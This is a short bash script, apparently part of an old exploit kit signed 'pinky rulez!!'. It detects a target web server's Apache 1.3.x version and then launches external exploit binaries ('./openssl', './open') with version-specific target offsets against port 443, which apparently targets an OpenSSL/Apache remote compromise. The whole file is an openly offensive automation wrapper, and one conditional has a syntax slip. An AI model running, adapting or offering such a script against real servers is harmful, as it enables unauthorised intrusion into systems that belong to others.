#!/bin/bash
echo "Exploiting $1..pinky rulez!!"
ver1=`./httpdtype $1 | grep Apache/1.3.6`
if [ ! -z "$ver1" ]; then
./openssl -a 0x04 $1
fi
ver2=`./httpdtype $1 | grep Apache/1.3.9`
if [ ! -z "$ver2" ]; then
./openssl -a 0x05 $1
fi
ver3=`./httpdtype $1 | grep Apache/1.3.12`
if [ ! -z "$ver3" ]; then
./openssl -a 0x06 $1
./openssl -a 0x07 $1
./openssl -a 0x0e $1
fi
ver4=`./httpdtype $1 | grep Apache/1.3.19`
if [ ! -z "$ver4" ]; then
./openssl -a 0x08 $1
./openssl -a 0x10 $1
./openssl -a 0x16 $1
fi
ver5=`./httpdtype $1 | grep Apache/1.3.20`
if [ ! -z "$ver5" ]; then
./openssl -a 0x09 $1
./openssl -a 0x11 $1
./openssl -a 0x17 $1
fi
ver6=`./httpdtype $1 | grep Apache/1.3.26`
if [ ! -z "$ver6" ]; then
./openssl -a 0x01 $1
./openssl -a 0x02 $1
./openssl -a 0x03 $1
./openssl -a 0x0a $1
./openssl -a 0x0d $1
fi
ver7=`./httpdtype $1 | grep Apache/1.3.23`
if [ ! -z "$ver7"]; then
./openssl -a 0x0b $1
./openssl -a 0x12 $1
./openssl -a 0x13 $1
./openssl -a 0x18 $1
fi
ver8=`./httpdtype $1 | grep Apache/1.3.14`
if [ ! -z "$ver8" ]; then
./openssl -a 0x14 $1
./openssl -a 0x15 $1
fi
ver9=`./httpdtype $1 | grep Apache/1.3.22`
if [ ! -z "$ver9" ]; then
./openssl -a 0x0c $1
fi
ver10=`./httpdtype $1 | grep Apache/1.3.24`
if [ ! -z "$ver10" ]; then
./openssl -a 0x00 $1
fi
ver11=`./httpdtype $1 | grep Apache/1.3.26`
if [ ! -z "$ver11" ]; then
./open -h $1 -t 0x00 -p 443
./open -h $1 -t 0x01 -p 443
./open -h $1 -t 0x02 -p 443
./open -h $1 -t 0x04 -p 443
fi
ver12=`./httpdtype $1 | grep Apache/1.3.19`
if [ ! -z "$ver12" ]; then
./open -h $1 -t 0x03 -p 443
fi
ver=`./httpdtype $1`
echo "*  $1:$ver  * not vulnerable.."